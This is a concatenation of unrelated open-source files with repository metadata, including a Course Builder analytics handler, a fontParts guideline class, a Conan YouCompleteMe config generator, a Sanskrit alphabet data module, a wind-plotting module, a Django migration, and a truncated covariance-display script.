An array of HTML sections. This will consist of SafeDom elements
and the result of HTML template expansion.
"""
# pylint: disable=protected-access
return display._generate_display_html(
_TemplateRenderer(handler), xsrf_creator, handler.app_context,
visualizations)
class TabRenderer(object):
"""Convenience class for creating tabs for rendering in dashboard."""
def __init__(self, contents):
self._contents = contents
def __call__(self, handler):
return generate_display_html(
handler, crypto.XsrfTokenManager, self._contents)
class AnalyticsHandler(controllers_utils.ReflectiveRequestHandler,
controllers_utils.ApplicationHandler):
default_action = 'run_visualization'
get_actions = []
post_actions = ['run_visualizations', 'cancel_visualizations']
def _get_generator_classes(self):
# pylint: disable=protected-access
return analytics_utils._generators_for_visualizations(
[Visualization.for_name(name)
for name in self.request.get_all('visualization')])
def post_run_visualizations(self):
for generator_class in self._get_generator_classes():
generator_class(self.app_context).submit()
self.redirect(str(self.request.get('r')))
def post_cancel_visualizations(self):
for generator_class in self._get_generator_classes():
generator_class(self.app_context).cancel()
self.redirect(str(self.request.get('r')))
class AnalyticsStatusRESTHandler(controllers_utils.BaseRESTHandler):
URL = '/analytics/rest/status'
def get(self):
generator_classes = set()
for visualization_name in self.request.get_all('visualization'):
visualization = Visualization.for_name(visualization_name)
generator_classes.update(visualization.generator_classes)
generator_status = {}
for generator_class in generator_classes:
job = generator_class(self.app_context).load()
generator_status[generator_class] = job and job.has_finished
finished_visualizations = set()
finished_sources = set()
finished_generators = set()
all_visualizations_finished = True
for visualization_name in self.request.get_all('visualization'):
all_sources_finished = True
visualization = Visualization.for_name(visualization_name)
for data_source_class in visualization.data_source_classes:
all_generators_finished = True
for generator_class in data_source_class.required_generators():
all_generators_finished &= generator_status[generator_class]
all_sources_finished &= all_generators_finished
if all_generators_finished:
if issubclass(data_source_class,
data_sources.AbstractRestDataSource):
finished_sources.add(data_source_class.get_name())
else:
finished_sources.add(data_source_class.__name__)
all_visualizations_finished &= all_sources_finished
if all_sources_finished:
finished_visualizations.add(visualization_name)
result = {
'finished_visualizations': finished_visualizations,
'finished_sources': finished_sources,
'finished_generators': finished_generators,
'finished_all': all_visualizations_finished,
}
transforms.send_json_response(self, 200, "Success.", result)
def get_namespaced_handlers():
return [
('/analytics', AnalyticsHandler),
(AnalyticsStatusRESTHandler.URL, AnalyticsStatusRESTHandler),
]
def get_global_handlers():
# Restrict files served from full zip package to minimum needed
return []
| {
"content_hash": "fca400d0764c827a6234931730d74616",
"timestamp": "",
"source": "github",
"line_count": 250,
"max_line_length": 80,
"avg_line_length": 37.916,
"alnum_prop": 0.6431058128494567,
"repo_name": "andela-angene/coursebuilder-core",
"id": "d51649f34607e6dcf5a226da987c26babd76720a",
"size": "10077",
"binary": false,
"copies": "4",
"ref": "refs/heads/develop-frontend",
"path": "coursebuilder/models/analytics/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "729194"
},
{
"name": "HTML",
"bytes": "739873"
},
{
"name": "JavaScript",
"bytes": "720406"
},
{
"name": "Python",
"bytes": "6245524"
},
{
"name": "Shell",
"bytes": "53815"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
result = Building()
result.template = "object/building/poi/shared_naboo_gungtrad_medium2.iff"
result.attribute_template_id = -1
result.stfName("poi_n","base_poi_building")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | {
"content_hash": "99347f4ff5bc16593413a65edc3e1be1",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 74,
"avg_line_length": 23.692307692307693,
"alnum_prop": 0.6948051948051948,
"repo_name": "anhstudios/swganh",
"id": "78e7ee98a852febddde9276ef65087c9869edfd5",
"size": "453",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "data/scripts/templates/object/building/poi/shared_naboo_gungtrad_medium2.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11887"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2357839"
},
{
"name": "CMake",
"bytes": "41264"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7503510"
},
{
"name": "SQLPL",
"bytes": "42770"
}
],
"symlink_target": ""
} |
"""Data module for the Sanskrit languages alphabet and related characters."""
# The digits in sanskrit start from index 0 to 9. The index
# of the list tells about the corresponding number digit in Sanskrit
DIGITS = ['०','१','२','३','४','५','६','७','८','९']
# This is a list of Simple Vowels for Sanskrit Language.
# They give the sound aaa, e, ee, u, uuu,e,o, ri, lri
INDEPENDENT_VOWELS_SIMPLE = ['अ','आ','इ','ई','उ','ऊ','ए','ओ','ऋ','ऌ']
# These vowels are dipthongs in Sanskrit meaning they are pronounced differently depending on
#They give the sound ai, au
INDEPENDENT_VOWELS_DIPTHONGS = ['ऐ','औ']
#These are other independent alphabets which are not vowels or consonants either but are placed in with vowels
# These are anuswara and visarga
# Anuswara gives a nasal sound and its point of pronounciation is same as the consonant that follows it
# For example, The word Sanskrit has a anuswara and is pronounced as sans-kri-ta.
# Anuswara is pronounced like "h" in "house".
INDEPENDENT_VOWELS = ['अं','अः']
#The given are the dependent vowels, these are added after or on the consonants
DEPENDENT_VOWELS = ['ा','ि','ी','ु','ू','े','ै','ो','ौ','ं','ः','ृ','ॄ']
# These are the various consonants in Sanskrit.
# As we move from Index 0 to the last index of the list, We go from unaspirated to nasal.
# These consonants require the part of throat for pronouncing
CONSONANT_GUTTURALS = ['क','ख','ग','घ','ङ']
# These consonants require rear tongue parts for the pronounciation of the consonant
CONSONANT_PALATALS = ['च','छ','ज','झ','ञ']
# These consonant require tongue tip for pronounciation
CONSONANT_CEREBRALS = ['ट','ठ','ड','ढ','ण']
# These consonant require the top teeth part for the pronounciation
CONSONANT_DENTALS = ['त','थ','द','ध','न']
# These consonants require the part of lips for pronounciation
CONSONANT_LABIALS = ['प','फ','ब','भ','म']
# These almost sound like vowel when pronouncing, hence semi-vowel
SEMIVOWEL_CONSONANT = ['य','र','ल','व']
# These consonants make a hiss sound when pronounced.
SIBILANT_CONSONANT = ['श','ष','स']
# This consonant requires air to come out of lungs for the pronounciation
SONANT_ASPIRATE = ['ह']
# These are the other alphabets which are used in Sanskrit language.
# At Index 0, The alphabet is called Om symbol.At Index 1, we have the Virama Symbol(also called halant)
# which is used in sacred texts for supressing inherent vowels in the consonant letter.
# At Index 3 we have chandrabindu used for nasalization of vowel.
# At Index 4 we have the letter called avagraha, 5th Index symbol is called as the nukta
# At index 6 and 7 we have the danda and double-danda used for ending shlokas in Sanskrit
OTHER_ALPHABETS = ['ॐ','्','ँ','ऽ','़','।','॥']
| {
"content_hash": "871ab4057e6a545fdcab9c045a0b45fb",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 110,
"avg_line_length": 37.93055555555556,
"alnum_prop": 0.706334675942878,
"repo_name": "LBenzahia/cltk",
"id": "2803ab0ce5527c62ef20fd6e0e952cde1b84ac20",
"size": "2889",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "cltk/corpus/sanskrit/alphabet.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "4825"
},
{
"name": "Python",
"bytes": "2810724"
}
],
"symlink_target": ""
} |
"""Plots relating to the wind."""
from makani.analysis.plot.python import mplot
from makani.lib.python.h5_utils import numpy_utils
from matplotlib.pyplot import plot
from matplotlib.pyplot import ylabel
import pandas as pd
MFig = mplot.PlotGroup.MFig # pylint: disable=invalid-name
class Plots(mplot.PlotGroup):
"""Plots of the wind data."""
@MFig(title='Wind speed at ground level', ylabel='Speed [m/s]',
xlabel='Time [s]')
def PlotWindSpeedAtGround(self, c):
wind_g_mag = numpy_utils.Vec3Norm(c['state_est']['wind_g']['vector'])
plot(c['time'], wind_g_mag)
@MFig(title='Wind speed aloft', ylabel='Speed [m/s]', xlabel='Time [s]')
def PlotWindSpeedAloft(self, c):
wind_aloft_g_mag = numpy_utils.Vec3Norm(
c['state_est']['wind_aloft_g']['vector'])
plot(c['time'], wind_aloft_g_mag)
@MFig(title='Turbulence Intensity', xlabel='Time [s]', pedantic=False)
def PlotTurbulenceIntensity(self, c, window_minutes=5):
assert isinstance(window_minutes, int)
assert window_minutes >= 1
df = pd.DataFrame(index=pd.to_timedelta(c['time'], unit='s'))
df['wind_g_mag'] = numpy_utils.Vec3Norm(c['state_est']['wind_g']['vector'])
df_1s = df.resample('1s', label='right').agg(['mean', 'std'])
df_1s_nt = df_1s.xs('mean', level=1, axis='columns').rolling(
window='%dT' % window_minutes,
min_periods=window_minutes * 60).agg(['mean', 'std']).shift(
periods=(-window_minutes * 60) // 2, freq='s')
df_1s_nt_ti = (df_1s_nt[('wind_g_mag', 'std')] /
df_1s_nt[('wind_g_mag', 'mean')])
ylabel('TI (over %d-minute rolling calculations)' % window_minutes)
plot(df_1s_nt_ti.keys().total_seconds(), df_1s_nt_ti)
| {
"content_hash": "96063500612260e84d1fc2d8f79c9d89",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 79,
"avg_line_length": 40,
"alnum_prop": 0.6395348837209303,
"repo_name": "google/makani",
"id": "098b15d7e683a81504a338ec28212238b2589b77",
"size": "2309",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "analysis/plot/python/plot_groups/wind.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "119408"
},
{
"name": "C",
"bytes": "20174258"
},
{
"name": "C++",
"bytes": "30512322"
},
{
"name": "CSS",
"bytes": "8921"
},
{
"name": "Dockerfile",
"bytes": "1381"
},
{
"name": "Emacs Lisp",
"bytes": "1134"
},
{
"name": "HTML",
"bytes": "65745"
},
{
"name": "Java",
"bytes": "1558475"
},
{
"name": "JavaScript",
"bytes": "130727"
},
{
"name": "Jupyter Notebook",
"bytes": "1154728"
},
{
"name": "MATLAB",
"bytes": "1026162"
},
{
"name": "Makefile",
"bytes": "2798"
},
{
"name": "Objective-C",
"bytes": "62972"
},
{
"name": "Perl",
"bytes": "870724"
},
{
"name": "Python",
"bytes": "5552781"
},
{
"name": "RPC",
"bytes": "195736"
},
{
"name": "Roff",
"bytes": "2567875"
},
{
"name": "SWIG",
"bytes": "8663"
},
{
"name": "Shell",
"bytes": "297941"
},
{
"name": "Starlark",
"bytes": "462998"
},
{
"name": "Vim Script",
"bytes": "2281"
},
{
"name": "XC",
"bytes": "50398"
},
{
"name": "XS",
"bytes": "49289"
}
],
"symlink_target": ""
} |
from conans.model import Generator
import json
class YouCompleteMeGenerator(Generator):
template = '''
# This file is NOT licensed under the GPLv3, which is the license for the rest
# of YouCompleteMe.
#
# Here's the license text for this file:
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org/>
import os
import json
import ycm_core
import logging
_logger = logging.getLogger(__name__)
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-x', 'c++'
]
conan_flags = json.loads(open("conan_ycm_flags.json", "r").read())
flags.extend(conan_flags["flags"])
flags.extend(conan_flags["defines"])
flags.extend(conan_flags["includes"])
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = os.path.join(DirectoryOfThisScript(), 'Debug')
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
if not database.DatabaseSuccessfullyLoaded():
_logger.warn("Failed to load database")
database = None
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def GetAbsolutePath(include_path, working_directory):
if os.path.isabs(include_path):
return include_path
return os.path.join(working_directory, include_path)
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
new_flag = GetAbsolutePath(flag, working_directory)
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = flag[:len(path_flag)] + GetAbsolutePath(path, working_directory)
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension.lower() in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile( replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
relative_to = None
compiler_flags = None
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if compilation_info is None:
relative_to = DirectoryOfThisScript()
compiler_flags = flags
else:
relative_to = compilation_info.compiler_working_dir_
compiler_flags = compilation_info.compiler_flags_
else:
relative_to = DirectoryOfThisScript()
compiler_flags = flags
final_flags = MakeRelativePathsInFlagsAbsolute( compiler_flags, relative_to )
for flag in final_flags:
if flag.startswith("-W"):
final_flags.remove(flag)
_logger.info("Final flags for %s are %s" % (filename, ' '.join(final_flags)))
return {{
'flags': final_flags + ["-I/usr/include", "-I/usr/include/c++/{cxx_version}"],
'do_cache': True
}}
'''
@property
def filename(self):
pass
@property
def content(self):
def prefixed(prefix, values):
return [prefix + x for x in values]
conan_flags = {
"includes" : prefixed("-isystem", self.deps_build_info.include_paths),
"defines" : prefixed("-D", self.deps_build_info.defines),
"flags" : self.deps_build_info.cppflags
}
cxx_version = ''
try:
cxx_version = str(self.settings.compiler.version).split('.')[0]
except:
pass
ycm_data = self.template.format(cxx_version=cxx_version)
return {"conan_ycm_extra_conf.py" : ycm_data,
"conan_ycm_flags.json" : json.dumps(conan_flags, indent=2)}
| {
"content_hash": "aafeb67cb849feee04e9d3d1b1ae77c2",
"timestamp": "",
"source": "github",
"line_count": 196,
"max_line_length": 83,
"avg_line_length": 33.61734693877551,
"alnum_prop": 0.6926696008499014,
"repo_name": "luckielordie/conan",
"id": "9871fd9656e3532ecb0a85fc87e17bd1742c19bb",
"size": "6589",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "conans/client/generators/ycm.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1100"
},
{
"name": "Dockerfile",
"bytes": "3392"
},
{
"name": "Groovy",
"bytes": "7992"
},
{
"name": "Python",
"bytes": "3232431"
},
{
"name": "Shell",
"bytes": "1864"
}
],
"symlink_target": ""
} |
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 2.0.21
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kinow_client
from kinow_client.rest import ApiException
from kinow_client.models.product_comment_list_response import ProductCommentListResponse
class TestProductCommentListResponse(unittest.TestCase):
""" ProductCommentListResponse unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testProductCommentListResponse(self):
"""
Test ProductCommentListResponse
"""
model = kinow_client.models.product_comment_list_response.ProductCommentListResponse()
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "925ec4a65a0c0398e9044ff8aef52158",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 94,
"avg_line_length": 21.175,
"alnum_prop": 0.7012987012987013,
"repo_name": "kinow-io/kinow-python-sdk",
"id": "a3863581591eeef67ecf392a628ff856566960e6",
"size": "864",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_product_comment_list_response.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "4659182"
},
{
"name": "Shell",
"bytes": "1666"
}
],
"symlink_target": ""
} |
import math
from fontTools.misc import transform
from fontParts.base.base import (
BaseObject,
TransformationMixin,
InterpolationMixin,
SelectionMixin,
PointPositionMixin,
IdentifierMixin,
dynamicProperty,
reference
)
from fontParts.base import normalizers
from fontParts.base.compatibility import GuidelineCompatibilityReporter
from fontParts.base.color import Color
from fontParts.base.deprecated import DeprecatedGuideline, RemovedGuideline
class BaseGuideline(
BaseObject,
TransformationMixin,
DeprecatedGuideline,
RemovedGuideline,
PointPositionMixin,
InterpolationMixin,
IdentifierMixin,
SelectionMixin
):
"""
A guideline object. This object is almost always
created with :meth:`BaseGlyph.appendGuideline`.
An orphan guideline can be created like this::
>>> guideline = RGuideline()
"""
copyAttributes = (
"x",
"y",
"angle",
"name",
"color"
)
def _reprContents(self):
contents = []
if self.name is not None:
contents.append("'%s'" % self.name)
if self.layer is not None:
contents.append("('%s')" % self.layer.name)
return contents
# -------
# Parents
# -------
# Glyph
_glyph = None
glyph = dynamicProperty("glyph", "The guideline's parent :class:`BaseGlyph`.")
def _get_glyph(self):
if self._glyph is None:
return None
return self._glyph()
def _set_glyph(self, glyph):
if self._font is not None:
raise AssertionError("font for guideline already set")
if self._glyph is not None:
raise AssertionError("glyph for guideline already set")
if glyph is not None:
glyph = reference(glyph)
self._glyph = glyph
# Layer
layer = dynamicProperty("layer", "The guideline's parent :class:`BaseLayer`.")
def _get_layer(self):
if self._glyph is None:
return None
return self.glyph.layer
# Font
_font = None
font = dynamicProperty("font", "The guideline's parent :class:`BaseFont`.")
def _get_font(self):
if self._font is not None:
return self._font()
elif self._glyph is not None:
return self.glyph.font
return None
def _set_font(self, font):
if self._font is not None:
raise AssertionError("font for guideline already set")
if self._glyph is not None:
raise AssertionError("glyph for guideline already set")
if font is not None:
font = reference(font)
self._font = font
# --------
# Position
# --------
# x
x = dynamicProperty(
"base_x",
"""
The x coordinate of the guideline.
It must be an :ref:`type-int-float`. ::
>>> guideline.x
100
>>> guideline.x = 101
"""
)
def _get_base_x(self):
value = self._get_x()
if value is None:
return 0
value = normalizers.normalizeX(value)
return value
def _set_base_x(self, value):
if value is None:
value = 0
else:
value = normalizers.normalizeX(value)
self._set_x(value)
def _get_x(self):
"""
This is the environment implementation of
:attr:`BaseGuideline.x`. This must return an
:ref:`type-int-float`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
def _set_x(self, value):
"""
This is the environment implementation of
:attr:`BaseGuideline.x`. **value** will be
an :ref:`type-int-float`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
# y
y = dynamicProperty(
"base_y",
"""
The y coordinate of the guideline.
It must be an :ref:`type-int-float`. ::
>>> guideline.y
100
>>> guideline.y = 101
"""
)
def _get_base_y(self):
value = self._get_y()
if value is None:
return 0
value = normalizers.normalizeY(value)
return value
def _set_base_y(self, value):
if value is None:
value = 0
else:
value = normalizers.normalizeY(value)
self._set_y(value)
def _get_y(self):
"""
This is the environment implementation of
:attr:`BaseGuideline.y`. This must return an
:ref:`type-int-float`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
def _set_y(self, value):
"""
This is the environment implementation of
:attr:`BaseGuideline.y`. **value** will be
an :ref:`type-int-float`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
# angle
angle = dynamicProperty(
"base_angle",
"""
The angle of the guideline.
It must be an :ref:`type-angle`.
Please check how :func:`normalizers.normalizeRotationAngle`
handles the angle. There is a special case, when angle is ``None``.
If so, when x and y are not 0, the angle will be 0. If x is 0 but y
is not, the angle will be 0. If y is 0 and x is not, the
angle will be 90. If both x and y are 0, the angle will be 0.
::
>>> guideline.angle
45.0
>>> guideline.angle = 90
"""
)
def _get_base_angle(self):
value = self._get_angle()
if value is None:
if self._get_x() != 0 and self._get_y() != 0:
value = 0
elif self._get_x() != 0 and self._get_y() == 0:
value = 90
elif self._get_x() == 0 and self._get_y() != 0:
value = 0
else:
value = 0
value = normalizers.normalizeRotationAngle(value)
return value
def _set_base_angle(self, value):
if value is None:
if self._get_x() != 0 and self._get_y() != 0:
value = 0
elif self._get_x() != 0 and self._get_y() == 0:
value = 90
elif self._get_x() == 0 and self._get_y() != 0:
value = 0
else:
value = 0
value = normalizers.normalizeRotationAngle(value)
self._set_angle(value)
def _get_angle(self):
"""
This is the environment implementation of
:attr:`BaseGuideline.angle`. This must return an
:ref:`type-angle`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
def _set_angle(self, value):
"""
This is the environment implementation of
:attr:`BaseGuideline.angle`. **value** will be
an :ref:`type-angle`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
# --------------
# Identification
# --------------
# index
index = dynamicProperty(
"base_index",
"""
The index of the guideline within the ordered
list of the parent glyph's guidelines. This
attribute is read only. ::
>>> guideline.index
0
"""
)
def _get_base_index(self):
value = self._get_index()
value = normalizers.normalizeIndex(value)
return value
def _get_index(self):
"""
Get the guideline's index.
This must return an ``int``.
Subclasses may override this method.
"""
glyph = self.glyph
if glyph is not None:
parent = glyph
else:
parent = self.font
if parent is None:
return None
return parent.guidelines.index(self)
# name
name = dynamicProperty(
"base_name",
"""
The name of the guideline. This will be a
:ref:`type-string` or ``None``.
>>> guideline.name
'my guideline'
>>> guideline.name = None
"""
)
def _get_base_name(self):
value = self._get_name()
if value is not None:
value = normalizers.normalizeGuidelineName(value)
return value
def _set_base_name(self, value):
if value is not None:
value = normalizers.normalizeGuidelineName(value)
self._set_name(value)
def _get_name(self):
"""
This is the environment implementation of
:attr:`BaseGuideline.name`. This must return a
:ref:`type-string` or ``None``. The returned
value will be normalized with
:func:`normalizers.normalizeGuidelineName`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
def _set_name(self, value):
"""
This is the environment implementation of
:attr:`BaseGuideline.name`. **value** will be
a :ref:`type-string` or ``None``. It will
have been normalized with
:func:`normalizers.normalizeGuidelineName`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
# color
color = dynamicProperty(
"base_color",
""""
The guideline's color. This will be a
:ref:`type-color` or ``None``. ::
>>> guideline.color
None
>>> guideline.color = (1, 0, 0, 0.5)
"""
)
def _get_base_color(self):
value = self._get_color()
if value is not None:
value = normalizers.normalizeColor(value)
value = Color(value)
return value
def _set_base_color(self, value):
if value is not None:
value = normalizers.normalizeColor(value)
self._set_color(value)
def _get_color(self):
"""
This is the environment implementation of
:attr:`BaseGuideline.color`. This must return
a :ref:`type-color` or ``None``. The
returned value will be normalized with
:func:`normalizers.normalizeColor`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
def _set_color(self, value):
"""
This is the environment implementation of
:attr:`BaseGuideline.color`. **value** will
be a :ref:`type-color` or ``None``.
It will have been normalized with
:func:`normalizers.normalizeColor`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
# --------------
# Transformation
# --------------
def _transformBy(self, matrix, **kwargs):
"""
This is the environment implementation of
:meth:`BaseGuideline.transformBy`.
**matrix** will be a :ref:`type-transformation`.
that has been normalized with :func:`normalizers.normalizeTransformationMatrix`.
Subclasses may override this method.
"""
t = transform.Transform(*matrix)
# coordinates
x, y = t.transformPoint((self.x, self.y))
self.x = x
self.y = y
# angle
angle = math.radians(-self.angle)
dx = math.cos(angle)
dy = math.sin(angle)
tdx, tdy = t.transformPoint((dx, dy))
ta = math.atan2(tdy - t[5], tdx - t[4])
self.angle = -math.degrees(ta)
# -------------
# Interpolation
# -------------
compatibilityReporterClass = GuidelineCompatibilityReporter
def isCompatible(self, other):
"""
Evaluate interpolation compatibility with **other**. ::
>>> compatible, report = self.isCompatible(otherGuideline)
>>> compatible
True
>>> compatible
[Warning] Guideline: "xheight" + "cap_height"
[Warning] Guideline: "xheight" has name xheight | "cap_height" has
name cap_height
This will return a ``bool`` indicating if the guideline is
compatible for interpolation with **other** and a
:ref:`type-string` of compatibility notes.
"""
return super(BaseGuideline, self).isCompatible(other, BaseGuideline)
def _isCompatible(self, other, reporter):
"""
This is the environment implementation of
:meth:`BaseGuideline.isCompatible`.
Subclasses may override this method.
"""
guideline1 = self
guideline2 = other
# guideline names
if guideline1.name != guideline2.name:
reporter.nameDifference = True
reporter.warning = True
# -------------
# Normalization
# -------------
def round(self):
"""
Round the guideline's coordinate.
>>> guideline.round()
This applies to the following:
* x
* y
It does not apply to
* angle
"""
self._round()
def _round(self, **kwargs):
"""
This is the environment implementation of
:meth:`BaseGuideline.round`.
Subclasses may override this method.
"""
self.x = normalizers.normalizeRounding(self.x)
self.y = normalizers.normalizeRounding(self.y)
| {
"content_hash": "f659cb8055825b646b03438682365b9f",
"timestamp": "",
"source": "github",
"line_count": 508,
"max_line_length": 88,
"avg_line_length": 26.80708661417323,
"alnum_prop": 0.5424438243501248,
"repo_name": "robofab-developers/fontParts",
"id": "3014a48329f990fd4242fb34a30aaca848db768f",
"size": "13618",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Lib/fontParts/base/guideline.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "913380"
},
{
"name": "Shell",
"bytes": "1837"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('sites', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Entry',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=255, verbose_name='title')),
('slug', models.SlugField(max_length=255, verbose_name=b'slug', unique_for_date=b'pub_date')),
('pub_date', models.DateTimeField(default=datetime.datetime.now, verbose_name='publication date')),
('status', models.IntegerField(default=2, verbose_name='status', choices=[(1, 'Live'), (2, 'Draft'), (3, 'Hidden')])),
('excerpt', models.TextField(verbose_name='Excerpt', blank=True)),
('source', models.CharField(max_length=255, verbose_name='the source for the entry', blank=True)),
('author', models.ForeignKey(related_name='press_links_entry_related', verbose_name='author', to=settings.AUTH_USER_MODEL)),
('site', models.ManyToManyField(related_name='press_links_entry_related', verbose_name='Sites where the entry is published', to='sites.Site')),
],
options={
'ordering': ['-pub_date'],
'get_latest_by': 'pub_date',
'verbose_name': 'Press Entry',
'verbose_name_plural': 'Press Entries',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Link',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('link', models.CharField(max_length=255, verbose_name='link address (add http:// for external link)')),
('link_text', models.CharField(max_length=255, verbose_name='text for link')),
('link_new_page', models.BooleanField(default=False, verbose_name='open link in new page')),
('entry', models.ForeignKey(verbose_name='Entry', to='press_links.Entry')),
],
options={
'verbose_name': 'Press Link',
'verbose_name_plural': 'Press Links',
},
bases=(models.Model,),
),
]
| {
"content_hash": "5398a9cfbbf6176f13d1a310a40e7dd1",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 159,
"avg_line_length": 49.28846153846154,
"alnum_prop": 0.573546625048771,
"repo_name": "mvpoland/django-press-links",
"id": "fac3ae48b60cf89e00f3bdafbf4bb4732b8a98f8",
"size": "2587",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "press_links/migrations/0001_initial.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "4145"
},
{
"name": "Python",
"bytes": "27063"
}
],
"symlink_target": ""
} |
import argparse, sys
import numpy as np
from matplotlib import pyplot as plt
import scipy.sparse.linalg as LA
# Parse command line
parser = argparse.ArgumentParser(description='Display the result of the covariance example.')
parser.add_argument('input', help="path to covariance result (mean image or covariance image)")
args = parser.parse_args()
# Get input file
fname = args.input
print "Input file:", fname
# Set patch size
psize = 64
f = open(fname,"rb")
try:
header = np.fromfile(f, dtype=np.dtype('>i4'), count=3)
type = header[0]
rows = header[1]
cols = header[2]
print "opencv type: ", type
print "rows: ", rows, " cols: ", cols
mat = np.fromfile(f, dtype=np.dtype('>f'))
if (cols==psize):
print "Displaying Mean Image." # just display
imgplt = plt.imshow(np.reshape(mat, (-1,psize)))
imgplt.set_cmap('gray')
imgplt.set_clim(0.0,1.0)
plt.title('Average Patch')
plt.colorbar()
plt.show()
else:
print "Displaying Covariance Image." # compute eigenvectors and display first 15 in 5x3 grid
